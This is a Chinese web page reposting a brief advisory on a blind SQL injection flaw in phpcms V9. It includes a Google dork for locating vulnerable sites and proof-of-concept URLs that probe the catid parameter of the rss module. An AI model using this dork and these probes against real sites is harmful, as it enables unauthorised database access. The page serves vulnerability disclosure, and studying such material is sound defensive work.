手机
当前位置:查字典教程网 >网络安全 >漏洞分析 >phpcms V9 BLind SQL 注入漏洞0day
phpcms V9 BLind SQL 注入漏洞0day
摘要:影响版本:phpcmsv9blind官方网站:http://www.phpcms.cn漏洞类型:SQL注入漏洞描述:phpcmsv9blin...

影响版本:phpcms v9 blind

官方网站:http://www.phpcms.cn

漏洞类型:SQL注入

漏洞描述:phpcms v9 blind 参数过滤存在SQL注入漏洞。

google dork:inurl:"index.php?m=content+c=rss+catid=10"

exploit & p0c

[!] index.php?m=content&c=rss&catid=[valid catid]

Example p0c

[!] http://host/index.php?m=content&c=rss&catid=10 <= True

[!] http://host/index.php?m=content&c=rss&catid=-10 <= False

[+] http://host/index.php?m=content&c=rss&catid=5 <= show MySQL Error (table)

【phpcms V9 BLind SQL 注入漏洞0day】相关文章:

Toshiba Surveillix ActiveX 控件远程栈溢出漏洞

BBSXP2008存在后台注射漏洞

phpcms2008 注入漏洞

Cisco Unified IP Phone SCCP及SIP 协议安全漏洞

BBSXP绕过过滤继续注入漏洞分析

Coppermine Photo Gallery跨站脚本及SQL注入漏洞

IPB2注入漏洞的深入利用

PHP-Nuke 4nChat错误验证roomid参数 SQL注入漏洞

MirOS BSD Korn Shell本地权限提升漏洞

Unix主机安全漏洞分析

精品推荐
分类导航